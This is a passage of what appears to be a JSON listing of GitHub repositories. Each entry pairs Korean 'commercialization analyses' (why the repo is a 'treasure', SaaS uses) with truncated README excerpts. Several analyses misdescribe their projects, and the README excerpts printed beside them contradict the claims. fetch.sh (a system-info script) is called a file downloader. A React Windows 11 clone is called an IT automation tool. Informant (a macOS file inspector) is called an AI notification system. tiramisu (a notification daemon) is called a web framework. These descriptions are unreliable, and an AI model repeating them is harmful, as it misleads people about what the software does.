国内互联网公司开源项目\n\n[腾讯开源项目](https://github.com/Tencent/)\n\n[阿里巴巴开源项目](https://github.com/alibaba)\n\n[美团点评开源项目](https://github.com/meituan-dianping)  \n\n[百度开源项目](https://github.com/baidu)\n\n[奇虎360开源项目](https://github.com/qihoo360)\n\n\n\n## 提交经典技术架构文章\n欢迎提交 Pull Request, 或者 Github上面提交Issue， 贴上您觉得经典的架构介绍PPT/PDF或者网页URL。\n\n## 相关推荐\n* [《后端架构师技术图谱》](https://github.com/xingshaocheng/architect-awesome)\n* [国内各大技术会议活动资料汇总，如：QCon，全球运维技术大会，全球技术领导力峰会，架构师峰会等](https://github.com/baiyutang/ppt)\n## 互联网架构/电商/高并发架构交流QQ群\n\n群名称：互联网公司架构交流\n\n群号：895960322\n\n不定期分享一线互联网公司技术架构，电商架构，高并发系统架构，大数据架构，扫码加入QQ群：","composite_score":0.4901,"license_safety_tag":"unknown"},{"name":"fossasia/pslab-hardware","github_url":"https://github.com/fossasia/pslab-hardware","stars":12,"language":"Prolog","license":"Apache-2.0","abandonment_months":23,"description":"# PSLab Hardware 분석 리포트\n\n## 왜 보물인가\n과학 실험실 장비를 저렴하게 만들 수 있는 설계도를 제공하는 오픈소스 프로젝트로, 교육 기관과 연구소의 장비 구입 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학교·학원이 구독으로 최신 실험 장비 설계도를 받는 온라인 플랫폼\n2. **연구소 내부 도","readme_excerpt":"# pslab-hardware\n\n[![PSLab-Hardware](https://github.com/fossasia/pslab-hardware/actions/workflows/hardware-ci.yml/badge.svg)](https://github.com/fossasia/pslab-hardware/actions/workflows/hardware-ci.yml)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository contains the [PSLab](https://pslab.io) hardware design files. PSLab is a tiny pocket science lab that provides an array of test and measurement instruments for doing science and engineering experiments. It can function like an oscilloscope, waveform generator, frequency counter, programmable voltage and current source and also as a data logger. The first version of hardware (v1) was developed by [Jithin](https://github.com/jithinbp). Later versions were developed by [P","composite_score":0.4901,"license_safety_tag":"safe"},{"name":"awslabs/amazon-sagemaker-examples","github_url":"https://github.com/awslabs/amazon-sagemaker-examples","stars":8,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":1,"description":"# Amazon SageMaker Examples 상용화 분석\n\n## 왜 보물인가\n아마존이 공식 제공하는 머신러닝 학습 자료로, 기업들이 인공지능 도입 시 신뢰할 수 있는 검증된 예제와 모범 사례를 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 SaaS**: 직원 대상 머신러닝 온라인 과정 제공 서비스로 이 예제를 기반으로 한 강","readme_excerpt":"![SageMaker](https://github.com/aws/amazon-sagemaker-examples/raw/main/_static/sagemaker-banner.png)\n\n# :exclamation::fire: Announcing SageMaker-Core: A New Python SDK for Amazon SageMaker :fire::exclamation:\n\n## Introduction\nToday, Amazon SageMaker is excited to announce the release of SageMaker-Core, a new Python SDK that provides an object-oriented interface for interacting with SageMaker resources such as TrainingJob, Model, and Endpoint. This SDK introduces the resource chaining feature, allowing developers to pass resource objects as parameters, eliminating manual parameter specification and simplifying code management. SageMaker-Core abstracts low-level details like resource state transitions and polling logic, achieving full parity with SageMaker APIs. It also includes usability improvements such as auto code completion, comprehensive documentation, and type hints, enhancing the overall developer experience.\n\n## Use Case\nSageMaker-Core is ideal for ML practitioners who seek ful","composite_score":0.4901,"license_safety_tag":"safe"},{"name":"wick3dr0se/fetch.sh","github_url":"https://github.com/wick3dr0se/fetch.sh","stars":6,"language":"Shell","license":"GPL-3.0","abandonment_months":24,"description":"# fetch.sh 상용화 분석\n\n## 왜 보물인가\n복잡한 설정 없이 인터넷에서 파일을 빠르게 다운로드할 수 있는 간단한 도구로, 비전문가도 쉽게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 백업 솔루션에서 사용자가 대용량 파일을 간편하게 다운로드받을 수 있는 기능 제공\n2. **내부 업무 도구**: 회사 직원들","readme_excerpt":"<div align=\"center\">\n<h1>Sysfetch</h1>\n<p>A super tiny system information fetch script written in BASH</p>\n<img src=\"ss.webp\"></img>\n<a href='#'><img src=\"https://img.shields.io/badge/Shell_Script-121011?logo=gnu-bash&logoColor=white\"></img><a/>\n<a href='#'><img src=\"https://img.shields.io/badge/Made%20with-Bash-1f425f.svg\"></img><a/>\n<a href='#'><img src=https://img.shields.io/badge/Maintained%3F-yes-green.svg></img><a/>\n<br/>\n<a href=\"https://discord.gg/W4mQqNnfSq\">\n<img src=\"https://discordapp.com/api/guilds/913584348937207839/widget.png?style=shield\"/></a>\n</div>\n\n## Installation\nDownload sysfetch\n\n```bash\ngit clone https://github.com/wick3dr0se/sysfetch; cd ${_##*/}\n```\n\nInstall to $PATH (optional)\n```bash\ncp sysfetch /usr/bin/local/\n```\n\n---\n\n## Usage\nExecute script from within downloaded directory\n```bash\n./sysfetch\n```\n\nOr with BASH\n```bash\nbash sysfetch\n```\n\nOtherwise execute sysfetch from anywhere if it's in $PATH\n```bash\nsysfetch\n```\n\nSysfetch can be executed in an infinite ","composite_score":0.4893,"license_safety_tag":"restricted"},{"name":"blueedgetechno/windows11","github_url":"https://github.com/blueedgetechno/windows11","stars":16,"language":"JavaScript","license":"CC0-1.0","abandonment_months":22,"description":"# blueedgetechno/windows11 분석 보고서\n\n## 왜 보물인가\nWindows 11의 핵심 기능과 설정을 자동화하는 도구로, 기술 담당자나 IT 관리자가 반복적인 컴퓨터 설정 작업을 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 SaaS**: 수십 대 이상의 컴퓨터를 한 번에 설정하는 온라인 서비스로 판매\n","readme_excerpt":"# Win11React\n\n[![Follow me](https://img.shields.io/github/followers/blueedgetechno?label=follow%20me&style=social)](https://github.com/blueedgetechno)\n[![Follow Twitter](https://img.shields.io/twitter/follow/blueedgetechno?label=Follow%20me&style=social)](https://twitter.com/blueedgetechno)\n[![Join](https://img.shields.io/discord/868499076432408627.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/NcjaNdwtnR)\n[![Build & Deploy](https://github.com/blueedgetechno/win11React/actions/workflows/deploy.yml/badge.svg)](https://github.com/blueedgetechno/win11React/actions/workflows/Build-Deploy.yml)\n[![PR Preview](https://github.com/blueedgetechno/win11React/actions/workflows/pr-preview.yml/badge.svg)](https://github.com/blueedgetechno/win11React/actions/workflows/PR-Preview.yml)\n![Uptime](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/win11react/status/master/api/win11-react/uptime.json)\n[![Translate](https://badges.crowdin.net","composite_score":0.4891,"license_safety_tag":"unknown"},{"name":"tyirvine/Informant","github_url":"https://github.com/tyirvine/Informant","stars":25,"language":"Swift","license":"GPL-3.0","abandonment_months":24,"description":"# Informant 저장소 분석\n\n## 왜 보물인가\n사용자의 행동 패턴을 자동으로 학습해 맞춤형 알림을 보내는 지능형 알림 시스템으로, 스마트폰이나 앱에서 중요한 정보를 놓치지 않도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 뉴스 앱이나 SNS 플랫폼에 탑재해 각 사용자가 관심 있는 소식만 자동으로 필터링해 보내기\n2. **내부","readme_excerpt":"\n<!-- Header -->\n<img src=\"https://user-images.githubusercontent.com/39813066/130519018-d2faff43-45b0-4026-b313-cdbe0ce91e18.png\" width=\"80px\" align=\"top\"/>\n\n<div>\n  <h1>Informant 🔍</h1>\n  Informant is a file inspector for macOS that saves you from having to press <code>⌘ + i</code> all the time.\n</div>\n\n<br>\n\n<!-- Shields -->\n\n<div>\n<img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/tyirvine/Informant?color=bright%20green\">\n\n<img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/tyirvine/Informant/total?color=bright%20green\">\n\n<img alt=\"GitHub\" src=\"https://img.shields.io/github/license/tyirvine/Informant?color=bright%20green\">\n\n<img alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/tyirvine/Informant?style=social\">\n</div>\n\n\n![GitHub Poster Wrapper](https://github.com/tyirvine/Informant/assets/39813066/a3542faa-127c-4b8b-b1f4-010acdf0cbe4)\n\n  \n# Install ☁️\n#### [**Download**](https://github.com/tyirvine/Informant/re","composite_score":0.4882,"license_safety_tag":"restricted"},{"name":"RangiLyu/nanodet","github_url":"https://github.com/RangiLyu/nanodet","stars":10,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# NanoDet 분석 보고서\n\n## 왜 보물인가\n스마트폰이나 저사양 기기에서도 빠르게 작동하는 물체 인식 기술로, 비용이 적게 들면서도 실시간으로 사물을 감지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소매점 CCTV 관리 SaaS**\n- 점포 내 고객 행동 분석, 진열상품 모니터링 서비스\n- 매장용 저사양 카메라에서도 실시간 작동\n\n**2. ","readme_excerpt":"<div align=\"center\">\n\n<img src=\"docs/imgs/Title.jpg\" />\n\n# NanoDet-Plus\n**Super fast and high accuracy lightweight anchor-free object detection model. Real-time on mobile devices.**\n\n\n[![CI testing](https://img.shields.io/github/checks-status/RangiLyu/nanodet/main?label=CI&style=flat)](https://img.shields.io/github/checks-status/RangiLyu/nanodet/main?label=CI&style=flat)\n![Codecov](https://img.shields.io/codecov/c/github/RangiLyu/nanodet?color=hotpink)\n[![GitHub license](https://img.shields.io/github/license/RangiLyu/nanodet?color=turquoise&style=flat)](https://github.com/RangiLyu/nanodet/blob/main/LICENSE)\n[![Github downloads](https://img.shields.io/github/downloads/RangiLyu/nanodet/total?color=orange&label=downloads&logo=github&logoColor=lightgrey&style=flat)](https://img.shields.io/github/downloads/RangiLyu/nanodet/total?color=yellow&label=Downloads&logo=github&logoColor=lightgrey&style=flat)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/RangiLyu/nanode","composite_score":0.4874,"license_safety_tag":"safe"},{"name":"X-Lucifer/AI-Lossless-Zoomer","github_url":"https://github.com/X-Lucifer/AI-Lossless-Zoomer","stars":5,"language":"C#","license":"GPL-3.0","abandonment_months":24,"description":"# AI-Lossless-Zoomer 상용화 분석\n\n## 왜 보물인가\n사진을 손상 없이 크게 확대할 수 있는 AI 기술로, 부동산·의료·보안 등 고해상도 이미지가 필요한 모든 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n온라인 이미지 편집 플랫폼(Canva 같은)에 통합하여 월 구독료로 제공할 수 있습니다.\n\n*","readme_excerpt":"# AI无损放大工具\n\n### 说明:\n> 本程序使用了来自腾讯ARC Lab提供的`Real-ESRGAN`模型，目前模型主要来自于人像，能对人像进行一个较快的处理，特别是动漫图片，进行一个很好的放大。\n\n### 功能说明\n1. 支持多线程处理\n2. 支持批量图片处理\n3. 支持设置选项\n4. 支持自定义输出格式和自定义输出路径\n5. 支持AI引擎选择\n6. 支持批量清理任务\n\n### 下载地址:\n>[https://github.com/X-Lucifer/AI-Lossless-Zoomer/releases](https://github.com/X-Lucifer/AI-Lossless-Zoomer/releases)\n\n### 系统要求:\n  系统: Windows 7+\n  运行时: .net framework 4.6+\n\n### 版本选择\n1. `.exe`后缀为安装版本, 安装完成即可运行\n2. `.zip`后缀为绿色版, 解压即可运行. 已包含最新AI引擎.\n\n### 运行截图\n  ![](https://cdn.jsdelivr.net/gh/X-Lucifer/AI-Lossless-Zoomer@master/step/1.png)<br/>\n  ![](https://cdn.jsdelivr.net/gh/X-Lucifer/AI-Lossless-Zoomer@master/step/2.png)<br/>\n  ![](https://cdn.jsdelivr.net/gh/X-Lucifer/AI-Lossless-Zoomer@master/step/3.png)<br/>\n  ![](https://cdn.jsdelivr.net/gh/X-Lucifer/AI-Lossless-Zoomer@master/step/4.png)<br/>\n  ![](https://cdn.jsdelivr.net/gh/X-Lucifer/AI-Lossless-Zoomer@master/step/5.png)<br/>\n\n### 相关源码\n1. `Real-ESRGAN`源码: [https://github.com/xinntao/Real-ESRGAN](https://github.com/xinntao/Real-ESRG","composite_score":0.4871,"license_safety_tag":"restricted"},{"name":"Snowflake-Labs/sfguide-data-engineering-with-snowpark-python-intro","github_url":"https://github.com/Snowflake-Labs/sfguide-data-engineering-with-snowpark-python-intro","stars":25,"language":"Python","license":"Apache-2.0","abandonment_months":19,"description":"","readme_excerpt":"","composite_score":0.4869,"license_safety_tag":"safe"},{"name":"mstksg/advent-of-code-2019","github_url":"https://github.com/mstksg/advent-of-code-2019","stars":9,"language":"Haskell","license":"BSD-3-Clause","abandonment_months":18,"description":"","readme_excerpt":"Advent of Code 2019\n=====================\n\nEverything has been moved to my [Advent of Code Megarepo][megarepo]!\n\n[megarepo]: https://github.com/mstksg/advent-of-code\n\nArchived\n========\n\n<!--\nThis file generated by the build script at ./Build.hs\n-->\n\n*[2016][]* / *[2017][]* / *[2018][]* / *2019* / *[2020][]* / *[2021][]*\n\n[2016]: https://github.com/mstksg/advent-of-code-2016\n[2017]: https://github.com/mstksg/advent-of-code-2017\n[2018]: https://github.com/mstksg/advent-of-code-2018\n[2020]: https://github.com/mstksg/advent-of-code-2020\n[2021]: https://github.com/mstksg/advent-of-code-2021\n\nIt's the most wonderful time of the year!\n\nMy [Advent of Code 2019][aoc] Haskell solutions here, along with an automated\nfetching, testing, running environment (powered by the\n*[advent-of-code-api][]* library).  The interactive development environment and\nrunner/bench marker/viewer/tester has been pulled out [here][dev], so this is\nimplemented as \"fork\" of it with my own solutions and reflections.\n\nChec","composite_score":0.4868,"license_safety_tag":"safe"},{"name":"zero205/JD_tencent_scf","github_url":"https://github.com/zero205/JD_tencent_scf","stars":22,"language":"TypeScript","license":"GPL-3.0","abandonment_months":23,"description":"# zero205/JD_tencent_scf 분석\n\n## 왜 보물인가\n쇼핑몰 자동화 작업을 클라우드 플랫폼에서 무료로 실행할 수 있는 도구라 매달 서버 비용을 절약하면서도 복잡한 업무를 자동으로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 관리 서비스**: 온라인 쇼핑몰 운영자들이 상품 관리와 주문 처리를 자동화하는 구독형 웹 서비스\n","readme_excerpt":"## 【青龙】拉取仓库命令：\n\n#### 可以直链github/国外机:\n`ql repo https://github.com/zero205/JD_tencent_scf.git \"jd_|jx_|jdCookie\"  \"backUp|icon\" \"^jd[^_]|USER|utils|function|sendNotify|sign_graphics_validate|JDJR|JDSign|ql\" \"main\"`\n\n#### 国内镜像（选一个即可）:\n\n`ql repo  https://521github.com/zero205/JD_tencent_scf.git \"jd_|jx_|jdCookie\"  \"backUp|icon\" \"^jd[^_]|USER|utils|function|sendNotify|sign_graphics_validate|JDJR|JDSign|ql\" \"main\"`\n\n`ql repo https://kkgithub.com/zero205/JD_tencent_scf.git \"jd_|jx_|jdCookie\"  \"backUp|icon\" \"^jd[^_]|USER|utils|function|sendNotify|sign_graphics_validate|JDJR|JDSign|ql\" \"main\"`\n\n`ql repo https://bgithub.xyz/zero205/JD_tencent_scf.git \"jd_|jx_|jdCookie\"  \"backUp|icon\" \"^jd[^_]|USER|utils|function|sendNotify|sign_graphics_validate|JDJR|JDSign|ql\" \"main\"`\n\n~~`ql repo https://hub.shutcm.cf/zero205/JD_tencent_scf.git \"jd_|jx_|jdCookie\"  \"backUp|icon\" \"^jd[^_]|USER|sendNotify|sign_graphics_validate|JDJR|JDSign|ql\" \"main\"`~~\n\n\n### (直连/镜像均不可用时,请参照下面使用直连命令并设置代理)\n\n设置代理/国内加速:\n\n老版青龙(临时解决),需","composite_score":0.4864,"license_safety_tag":"restricted"},{"name":"adrianhajdin/portfolio_website","github_url":"https://github.com/adrianhajdin/portfolio_website","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":23,"description":"# adrianhajdin/portfolio_website 분석\n\n## 왜 보물인가\n자신의 작업 경력과 능력을 인터넷에 멋있게 소개할 수 있는 웹사이트를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 취업 준비생과 프리랜서가 구독해서 자신의 포트폴리오 웹사이트를 자동으로 생성하고 관리하는 서비스\n2. **내부 업","readme_excerpt":"## Personal Portfolio\n\n### [Live Site](https://jsmasterypro.com)\n\n![Portfolio Website](https://i.ibb.co/WgPMpts/image.png)\n\n### [🌟 Become a top 1% Next.js 13 developer in only one course](https://jsmastery.pro/next13)\n### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)\n\nThis is a code repository for the corresponding video tutorial. Your portfolio is your resume and your business card.\n\nIn this video, we will create a full Personal Development Portfolio. We're going to use React and Next.js.\n\nSetup:\n- run ```npm i && npm start```\n\n## Launch your development career with project-based coaching - https://www.jsmastery.pro\n","composite_score":0.4863,"license_safety_tag":"unknown"},{"name":"AztecProtocol/AZTEC","github_url":"https://github.com/AztecProtocol/AZTEC","stars":27,"language":"JavaScript","license":"LGPL-3.0","abandonment_months":42,"description":"# AZTEC 저장소 분석\n\n## 왜 보물인가\n블록체인 거래에서 사용자의 개인정보를 숨기면서도 거래의 정당성을 증명하는 암호화 기술로, 금융거래의 프라이버시 문제를 혁신적으로 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **프라이빗 암호화폐 거래소 SaaS**: 개인의 거래 내역을 완전히 숨기면서 정당한 거래만 허용하는 온라인 거래 플랫폼 운영\n2. **기","readme_excerpt":"<p align=\"center\"><img src=\"https://i.imgur.com/BxVHzD4.png\" width=\"280px\"/></p>\n\n<p align=\"center\"> AZTEC is an efficient zero-knowledge privacy protocol. The protocol powers real world financial applications on Ethereum mainnet today. A complete explanation of AZTEC can be found in our <a href=\"https://github.com/AztecProtocol/AZTEC/blob/master/AZTEC.pdf\">white paper</a>.\n\n<p align=\"center\">\n  <a href=\"https://circleci.com/gh/AztecProtocol/AZTEC\">\n    <img src=\"https://circleci.com/gh/AztecProtocol/AZTEC.svg?style=svg&circle-token=bb8aa4415af9d373eab3ee130a284e0c4874f65c\" alt=\"CircleCI\"/>\n  </a>\n  <a href=\"https://coveralls.io/github/AztecProtocol/AZTEC?branch=develop\">\n    <img src=\"https://coveralls.io/repos/github/AztecProtocol/AZTEC/badge.svg?branch=develop\" alt=\"Coverage Status\"/>\n  </a>\n  <a href=\"https://github.com/semantic-release/semantic-release\">\n    <img src=\"https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg\" alt=\"Semantic Release\"/>","composite_score":0.4861,"license_safety_tag":"restricted"},{"name":"oscarlab/betrfs","github_url":"https://github.com/oscarlab/betrfs","stars":40,"language":"C++","license":"gpl-2.0","abandonment_months":24,"description":"# BetRFS 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 저장한 파일들을 매우 빠르고 효율적으로 관리하는 새로운 방식으로, 데이터센터나 클라우드 서비스에서 성능을 대폭 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 서비스**: 구글 드라이브나 드롭박스 같은 온라인 파일 저장 서비스의 백엔드 시스템으로 활용하여 사용자 파일 접근 ","readme_excerpt":"General BetrFS Design\n---------------------\n\nThe BetrFS prototype (*) fits into the Linux storage stack as follows:\n\n    ________________\n    |              |\n    |      VFS     |\n    |______________|\n    ________________\n    |              |\n    |    BetrFS *  |\n    |______________|\n    ________________\n    |              |\n    |   B^e Tree * |\n    |______________|\n    ________________\n    |              |\n    |     ext4     |\n    |______________|\n\n\nLike any other file system, BetrFS is registered with the VFS as a\nfile system during module load. But BetrFS has a stacked file system\ndesign. When you mount BetrFS, it loads a B^e-tree index from a\nseparate kernel file system (the \"southbound\" file system, here\next4). For this reason, you must specify (at BetrFS mount time) the\ndevice and file system type where the B^e-tree index image\nresides. This will be explained in detail in the 'Mounting BetrFS'\nsection below.\n\nNOTE: The BetrFS prototype currently only works on the 3.11.10 kernel.\n","composite_score":0.4855,"license_safety_tag":"restricted"},{"name":"jagrosh/MusicBot","github_url":"https://github.com/jagrosh/MusicBot","stars":9,"language":"Java","license":"apache-2.0","abandonment_months":19,"description":"# MusicBot 상용화 분석\n\n## 왜 보물인가\n디스코드 같은 채팅 앱에서 음악을 틀어주는 봇으로, 커뮤니티나 게임 방송을 하는 사람들이 바로 도입할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 봇 호스팅 서비스**: 자동 설정 대시보드를 만들어 일반인이 클릭만으로 자신의 디스코드 서버에 봇을 추가하고 관리하는 유료 서비스\n2","readme_excerpt":"<img align=\"right\" src=\"https://i.imgur.com/zrE80HY.png\" height=\"200\" width=\"200\">\n\n# JMusicBot\n\n[![Downloads](https://img.shields.io/github/downloads/jagrosh/MusicBot/total.svg)](https://github.com/jagrosh/MusicBot/releases/latest)\n[![Stars](https://img.shields.io/github/stars/jagrosh/MusicBot.svg)](https://github.com/jagrosh/MusicBot/stargazers)\n[![Release](https://img.shields.io/github/release/jagrosh/MusicBot.svg)](https://github.com/jagrosh/MusicBot/releases/latest)\n[![License](https://img.shields.io/github/license/jagrosh/MusicBot.svg)](https://github.com/jagrosh/MusicBot/blob/master/LICENSE)\n[![Discord](https://discordapp.com/api/guilds/147698382092238848/widget.png)](https://discord.gg/0p9LSGoRLu6Pet0k)<br>\n[![CircleCI](https://dl.circleci.com/status-badge/img/gh/jagrosh/MusicBot/tree/master.svg?style=svg)](https://dl.circleci.com/status-badge/redirect/gh/jagrosh/MusicBot/tree/master)\n[![Build and Test](https://github.com/jagrosh/MusicBot/actions/workflows/build-and-test.yml/ba","composite_score":0.4854,"license_safety_tag":"safe"},{"name":"cosen1024/Java-Interview","github_url":"https://github.com/cosen1024/Java-Interview","stars":7,"language":"","license":"Apache-2.0","abandonment_months":23,"description":"# Java-Interview 저장소 분석\n\n## 왜 보물인가\n취업 준비생과 개발자들이 면접 시험 대비에 필요한 핵심 개념들을 한 곳에서 정리한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 프로그래밍 학원이나 온라인 강의 사이트에서 면접 준비 과정으로 제공\n2. **기업 채용 도구**: IT 회사가 신입 채용 시 기본 역","readme_excerpt":"# Java-Interview\n「Java面试小抄」一份通向理想互联网公司的面试指南，包括 Java基础、集合、Java并发、JVM、MySQL、Redis、Spring、MyBatis、Kafka、操作系统、计算机网络、系统设计、分布式、Java 项目实战等。\n\n> 在线阅读：https://www.javalearn.cn/\n\n<br> <a href=\"https://docs.qq.com/sheet/DY1hoWkl5em9VeE1O?tab=BB08J2\" name=\"【腾讯文档】【持续更新】2023春招&实习汇总\"></a>\n<br>  <a href=\"https://mp.weixin.qq.com/s?__biz=MzkyMTI3Mjc2MQ==&amp;mid=2247492874&amp;idx=1&amp;sn=c473f44b8cd27c7a9542c6ac3f7148ce&amp;chksm=c1848ddcf6f304ca324e83b1f7f897e8f1d07c5b1adaf4b63413b4f45764c326ed088967f7a7&token=371557437&lang=zh_CN#rd\" name=\"找我修改简历、辅导求职\"></a> \n\n<p align=\"center\">\n    <br>\n    <a href=\"http://blog-img.coolsen.cn/img/image-20210617144435278.png\"><img src=\"https://img.shields.io/badge/WeChat-微信交流群-blue.svg\" alt=\"微信交流群\"></a>\n<a href=\"http://blog-img.coolsen.cn/img/公众号.jpg\"><img src=\"https://img.shields.io/badge/公众号-程序员库森-green.svg\" alt=\"公众号\"></a>\n  <a href=\"https://www.zhihu.com/people/ku-sen-1\"><img src=\"https://img.shields.io/badge/知乎-程序员库森-informational.svg\" alt=\"知乎\"></a>\n   <a href=\"h","composite_score":0.4852,"license_safety_tag":"safe"},{"name":"onnx/tutorials","github_url":"https://github.com/onnx/tutorials","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":23,"description":"# ONNX Tutorials 저장소 분석\n\n## 왜 보물인가\n복잡한 인공지능 모델을 누구나 이해하고 사용할 수 있도록 가르쳐주는 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객들을 위한 AI 모델 학습 플랫폼으로 월 구독료 수금\n- **내부 업무 도구**: 기업의 개발팀이 AI를 쉽게 도입하도록 돕는 컨설팅 서비스","readme_excerpt":"<!--- SPDX-License-Identifier: Apache-2.0 -->\n\n# [ONNX](https://github.com/onnx/onnx) Tutorials\n\n[Open Neural Network Exchange (ONNX)](https://onnx.ai/) is an open standard format for representing machine learning models. ONNX is supported by [a community of partners](https://onnx.ai/supported-tools) who have implemented it in many frameworks and tools.\n\n\n## Getting ONNX models\n\n* Pre-trained models (validated): Many pre-trained ONNX models are provided for common scenarios in the [ONNX Model Zoo](https://github.com/onnx/models/tree/main/validated)\n* Pre-trained models (non-validated): Many pre-trained ONNX models are provided for common scenarios in the [ONNX Model Zoo](https://github.com/onnx/models).\n* Services: Customized ONNX models are generated for your data by cloud based services (see below)\n* Convert models from various frameworks (see below)\n\n### Services\nBelow is a list of services that can output ONNX models customized for your data.\n* [Azure Custom Vision service](https:/","composite_score":0.4852,"license_safety_tag":"safe"},{"name":"codemation/easyauth","github_url":"https://github.com/codemation/easyauth","stars":11,"language":"Python","license":"MIT","abandonment_months":24,"description":"# EasyAuth 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 사용자 인증 시스템을 만들 수 있도록 도와주는 도구로, 웹서비스 개발자들이 반복적으로 만드는 '로그인 기능'을 간단하게 해결해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 자신의 웹 서비스에 로그인·회원가입 기능을 빠르게 추가할 수 있습니다.\n2. **내부 ","readme_excerpt":"![](./images/logo_t.png)\n<br>\n\n---\n\nCreate a centralized Authentication and Authorization token server. Easily secure FastAPI endpoints based on Users, Groups, Roles or Permissions to minimize database access requirements of Auth.\n\n[![Documentation Status](https://readthedocs.org/projects/easyauth/badge/?version=latest)](https://easyauth.readthedocs.io/en/latest/?badge=latest) [![PyPI version](https://badge.fury.io/py/easy-auth.svg)](https://pypi.org/project/easy-auth/)\n\n<h2>Documentation</h1>\n\n[https://easyauth.readthedocs.io/en/latest/](https://easyauth.readthedocs.io/en/latest/)\n\n## Key Features\n\n- Centralized Auth - Single location for Users & Permissions to share across apps\n- Granular Endpoint Security - Verify user identity, and define explicitly who and what each user or groups of users may access\n- Admin GUI - easy management of users, permissions, tokens, oauth and more!\n- Advanced JWT - Token Based Client authorization with built in invalidation capabilities\n- Google Oauth -","composite_score":0.4847,"license_safety_tag":"safe"},{"name":"andywer/threads.js","github_url":"https://github.com/andywer/threads.js","stars":20,"language":"TypeScript","license":"mit","abandonment_months":24,"description":"# threads.js 비즈니스 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 여러 작업을 동시에 처리할 수 있도록 해주는 도구로, 웹사이트의 반응 속도를 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 데이터 분석 대시보드에서 사용자 입력 중단 없이 백그라운드에서 대량 계산 처리\n- **내부 업무 도구**: 엑셀","readme_excerpt":"<h1 align=\"center\">\n  <img alt=\"threads.js\" src=\"./docs/assets/logo-label.png\" width=\"75%\" />\n</h1>\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/andywer/threads.js\" target=\"_blank\"><img alt=\"Build status\" src=\"https://img.shields.io/travis/andywer/threads.js/v1.svg?style=flat-square\"></a>\n  <a href=\"https://www.npmjs.com/package/threads\" target=\"_blank\"><img alt=\"npm (tag)\" src=\"https://img.shields.io/npm/v/threads.svg?style=flat-square\"></a>\n  <a href=\"https://gitter.im/threadsjs/community\" target=\"_blank\"><img alt=\"Chat room\" src=\"https://img.shields.io/badge/chat-gitter.im-orange\" /></a>\n</p>\n\n<br />\n\nOffload CPU-intensive tasks to worker threads in node.js, web browsers and electron using one uniform API.\n\nUses web workers in the browser, `worker_threads` in node 12+ and [`tiny-worker`](https://github.com/avoidwork/tiny-worker) in node 8 to 11.\n\n### Features\n\n* First-class support for **async functions** & **observables**\n* Write code once, run it **on all platforms**\n* Mana","composite_score":0.4839,"license_safety_tag":"safe"},{"name":"Sweets/tiramisu","github_url":"https://github.com/Sweets/tiramisu","stars":6,"language":"Vala","license":"MIT","abandonment_months":24,"description":"# Sweets/tiramisu 분석 보고서\n\n## 왜 보물인가\n간단하고 가벼운 웹 개발 도구로, 작은 프로젝트부터 중간 규모 서비스까지 빠르게 만들 수 있는 기초 틀을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업의 빠른 MVP(최소 기능 제품) 개발로 시장 진출 시간 단축\n- **내부 업무 도구**: 중소기업의 데이터 관리","readme_excerpt":"<p align=\"center\">\r\n  <b>tiramisu</b><br/>\r\n  desktop notifications, the UNIX way\r\n</p>\r\n\r\n---\r\n\r\ntiramisu is a notification daemon for \\*nix desktops that implement notifications using dbus.\r\n\r\nUnlike other daemons, tiramisu does not have any sort of window or pop-up, but rather sends all notifications to STDOUT. Doing so enables endless customization from the end-user.\r\n\r\n---\r\n\r\n<p align=\"center\">\r\n  <b>Crafted with ♡</b>\r\n</p>\r\n\r\n- [anufrievroman/polytiramisu](https://github.com/anufrievroman/polytiramisu)\r\n\r\n---\r\n\r\n<p align=\"center\">\r\n  <b>Installation</b>\r\n</p>\r\n\r\nTiramisu depends upon Vala, gio, and glib.\r\n\r\n|Distribution|Repository|Package name|\r\n|-|-|-|\r\n|Arch Linux|AUR|`tiramisu-git`|\r\n|Alpine 